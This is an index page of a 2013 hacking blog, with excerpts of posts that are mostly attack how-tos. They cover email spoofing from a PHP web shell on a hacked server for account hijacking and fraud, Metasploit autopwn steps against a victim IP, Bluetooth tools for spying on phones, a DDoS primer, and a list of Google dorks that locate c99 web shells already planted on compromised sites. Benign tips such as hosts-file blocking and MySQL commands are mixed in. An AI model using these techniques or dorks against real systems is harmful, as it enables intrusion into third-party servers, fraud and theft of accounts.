Skip to main content

Posts

Showing posts from May, 2013

Block A Website

                             Block A Website Some times it becomes necessary to block a website on our Computers for one or other reason. You can easily and effectivily block access to a website by adding it to your Windows HOSTS file. Once the website is blocked in the HOSTS file, it will not appear in any of the browsers. That is, the website becomes completely unavailable. 1. Go to your HOSTS file which is located at: C:\WINDOWS\SYSTEM32\DRIVERS\ETC for Vista and XP C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000 C:\WINDOWS for Windows 98 and ME 2. Open HOSTS with Notepad. The default Windows HOSTS looks like this: ______________________ # Copyright © 1993-1999 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be place...

Email Spoofing with Php Shell

                                         Email Spoofing with Php Shell Hey guys in this tut i will be showing you how to fake with your friends, this method is also used to hijack a Facebook or other accounts many carders also fraud with noob users but my motive to share this is so that you can play with your friends , Please don't hurt any one with this Ok lets start,  So first we need some things in this Tut .. 1. A Server yours or hacked .. any in which u can upload a php shell 2. a mail support shell i prefer b374k as its mail do not just enter in spam box 3. Mind huh..  So iam in a Owned Server right now here with my b374k shell you can download it  here   --> This was Email Spoofing with a php shell and one more thing in this trick is you can't be traced within this trick :D , one more method for Email spoofing ...

Is Your Comuter Male Or Female?

Is Your Comuter Male Or Female::-- Friends sounds odd na but  its to funny and simple :) Have you think that your computer or Laptop are also male and female... wants to know your pc/laptop is male or female ?? So simple...Just follow the given insruction.. 4 Simple Steps- 1. Open Notepad 2. Type the following line in notepad: CreateObject("SAPI.SpVoice").Speak"Welcome To hacks001." 3. Save file as male-female.vbs 4. Run the file. OR Just Download it from here:- Male-Female If you hear a male voice, your pc is a boy If you hear a female voice, your pc is a girl My Lappy is Female :p

Top 15 Best Free Antivirus For Windows 7

                                         Top 15 Best Free Antivirus For Windows 7 Now a days we see a lot of people are searching for a good antivirus. No wonder people are searching are the antivirus software’s, but the thing is they want a consistent and a free antivirus which updates regularly and catches new viruses as soon as they try to enter your system. The moment we talk about the antivirus,we will say go for either Kaspersky, BitDefender, Norton, ESET NOD 32 and etc. But all these antivirus software’s are a bit expensive. So how to protect your data with our buying a antivirus software? No problem at all.i have a list of free antivirus softwares which run for both Windows 7 and Windows Xp. These free antiviruses are not only free but also very consistent and worthy to use. Here goes the list 1) Microsoft Security Essentials : I would say Micro...

Hack Via Nmap & Metasploit::.

How to hack a computer with Nmap and Metasploit Automated Hacking:: Just got to http://www.metasploit.com/ and download the Latest Framework (not the mini version). Now open the metasploit console. And type the following commands: 1: db_create (this will create database needed for this attack) 2: TYPE nmap -sT –sV XXX.XXX.XXX.XXX( X be the IP address of victim) Now give it time to scan and when it is complete type following command. 3: db_autopwn -p -t –e This would start the penetration test and great thing about this is that it does not need any manual configuration. Every thing will be done automatically and if the test is successful a shell will be created.

How to Hack a computer using Metasploit

How to Hack a computer using Metasploit Metasploit is one of the greatest Hacking tools ever. It makes the hacking easy for the Script Kiddies (new hackers). But Question comes How to use it to hack a computer? Metasploit Framework comes in command-line as well as GUI version. This article will deal with the command-line version. Followings are the basic commands of Metasploit that you should Learn by Heart. 1: help (show the commands.) 2: show info XXXX (to show the information on specified XXXX value, that is can be exploit or payload) 3: show options ( to show the options for a exploit and payload. Like RHOST, LHOST) 4: show exploits/payloads (to get a list of exploits/payloads) 5: use XXXX (to select the name of the exploit.) 6: set XXXX (to set the value of RHOST, LHOST or payload) 7: exploit (to launch a exploit on targeted machine.) Note: To hack a computer using Metasploit first you should have the enough information of the target ­­including 1: IP address 2:...

From A Minor Bug To Zero Day - Exploit Development

From A Minor Bug To Zero Day - Exploit Development  While searching on Youtube related to buffer overflow vulnerabilities, I came across an excellent presentation by Math Ahroni on Defcon which explains the complete life cycle of the exploit development, from a simple bug  to a Zero day, The presentation explains the whole process of exploit development from the process of fuzzing, location a bug, use of egg hunters etc. The vulnerability explained in this presentation at Defcon is a HP NNM buffer overflow exploit, however it's not as easy as it looks at first, The author had to go in lots of pain and complications in order to make this exploit working.   Link: -http://adf.ly/Pho4F

Create Bootable WIN XP\VISTA\WIN 7 USB

Create Bootable WIN XP\VISTA\WIN 7 USB It is very common that one time or other we all be forced to boot win XP/ 7/ Vista from USB due to many problems with our DVD drives or with their firmware versions or any other reason. If you are the one who is suffering to get this things done then this post is for you. Now you can create Windows 7, Vista, or the old XP bootable USB key with a few clicks. Yup, this is true. Read to know more! Requirements: ►USB atleast of 2GB capacity ►ISO of of your required OS(xp/7/vista) ►10 minutes of your precious time. ►A simple APP called WinToFlash tool (free) which you can download from here. Procedure: 1) Insert your pen drive and back up your files and folders as it will be formatted during the procedure. 2) Now execute WinToFlash tool. 3) Now follow the on screen instructions and browse to your Windows 7, Vista, or XP ISO files. 4) Now make sure your pen drive letter is correct. 5)The final step - Now press "create" butt...

--Short List of MySQL Commands--

Many Times While Setting Up Database We Get Hooked Up so here's some commands For MySQL. . Conventions used here: MySQL key words are shown in CAPS User-specified names are in small letters Optional items are enclosed in square brackets [ ] Items in parentheses must appear in the command, along with the parentheses Items that can be repeated as often as desired are indicated by an ellipsis ... Quoting in MySQL statments Don't quote database, table, or column names Don't quote column types or modifiers Don't quote numerical values Quote (single or double) non-numeric values Quote file names and passwords User names are NOT quoted in GRANT or REVOKE statements, but they are quoted in other statements. General Commands USE database_name       Change to this database. You need to change to some database when you first connect to MySQL.   SHOW DATABASES       Lists all MySQL databases on the system. ...

Top 15 Security/Hacking Tools & Utilities

Top 15 Vital Hacking Software and Tools   1. Nmap I think everyone has heard of this one, recently evolved into the 4.x series. Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source. Can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results. Get Nmap Here – http://www.insecure.org/nmap/download.html 2. Nessus Remote Security Scanner Recently went c...

Delete The Files Which You Cant Delete::..

 DELEATE AN "UNDELETABLE" FILE Hello Friends, this Tutorial is for all those who want to delete some files but they cannot delete them due to some reasons.  Well this is a Full Proof way of deleting any Damn File. After Deleting the File in this way there won’t be any trace of that File on your computer. Beware : Make sure that the file you are Deleting is not a System File. Open a Command Prompt window and leave it open. Close all open programs. Click Start, Run and enter TASKMGR.EXE Go to the Processes tab and End Process on Explorer.exe. Leave Task Manager open. Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in. At the command prompt type DEL <filename> where <filename> is the file you wish to delete. Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell. Close Task Manager. Or you can try this Open Notepad.exe Click File>Save As..> ...

HOW TO HACK MOBILE PHONE WITH BLUETOOTH HACKING LATEST SOFTWARE'S |::..

HOW TO HACK MOBILE PHONE WITH BLUETOOTH HACKING LATEST SOFTWARE'S:- So here comes D list of useful Blue-tooth Bypassing  Soft. 1. Super Blue-tooth Bypass 1.08 This Soft is used 4 controlling and reading in4 mation from remote Cell via Blue-tooth or infra. Cell list and SMS can be stored in HTML 4mat. In addition to it, it will display in4 mation about battery, network and sim card. Download Here: http://adf.ly/Pher2 2. Blue Scanner Blue Scanner searches out 4 Blue-tooth-enabled gadgets and try to extract as much in4 mation as possible 4 each newly discovered device in other words one can use this one to spy on others who are close.  Download Here:  http://adf.ly/PhexZ 3. Blue Sniff BlueSniff is a simple utility 4 finding discoverable and hidden Blue-tooth-enabled gadgets . It operates on Linux. 4. BlueBugger This simply exploits the BlueBug (name of a set of Blue-tooth security holes) vulnerability of D Blue-tooth-enabled gadgets . By exploiting the...

MD5 Hash Cracking With Perl . .

                                      ..::MD5 Hash Cracking With Perl::.. root@bt:~# Hi guys once again a simple but useful tutorial how to crack md5 hashes. If you have an password in md5 hash and you need password in plain text for this there is lot of tool' > and online websites too but they wont crack all md5 hash if your hash exist in thier database they will give u plain text password but if not than u have to use some tool like  > here we are using a perl script to crack an hash so i had encrypted an text "r2/." into a md5 hash which is "5d28a1f53e24a8b0a85d0a53348d49ad" so here we will try to decrypt it  > again with perl in a plain text so first of all here we already know the leth of text is 4 and it is included with specail characters like ". /" etc so our job will be easy  > but if we dont know the length and what kind of character inclu...
                     >>> DDOS- ATTACKS<<<<      1)Ddos      2)What does It mean ?: Distributive Denial of Services Attack.     3)Basically DDOS Attacks are used to bring Down  Particular Site/s     4)How Do they Work:Shutting down a network path or flooding a server by sending large amount of Ping                                                        .       request  packets due to which the  transmission of data between a server and user gets disconnected ,  .       and            website goes on a offline stage.    5)How DDOS Uing Command Prompt:    Do just Follow These Steps;    Find Out A small or Medium ...

Google Dorks:Already Uploaded Shells . .C99 Shells

Following are is a google dorks   which can be used to find already   uploaded shells via Google. Dork List :  Get Shells For You too Download Here . And The Password Is Jaihind safe-mode: off (not secure) drwxrwxrwx c99shell inurl:c99.php inurl:c99.php uid=0(root) root c99.php "Captain Crunch Security Team" inurl:c99 inurl:c99.php allinurl: c99.php inurl:c99.php inurl:"c99.php" c99shell inurl:c99.php uid=0(root) c99shell powered by admin c99shell powered by admin inurl:"/c99.php" inurl:c99.php c99 shell v.1.0 (roots) inurl:c99.php allintitle: "c99shell" inurl:"c99.php allinurl: "c99.php" inurl:c99.php intitle:C99Shell v. 1.0 pre-release +uname allinurl: "c99.php" inurl:c99.php inurl:"c99.php" c99shell inurl:"/c99.php inurl:/c99.php+uname allinurl:"c99.php" inurl:"c99.php" allinurl:c99.php "inurl:c99..php" c99shell [file on secure...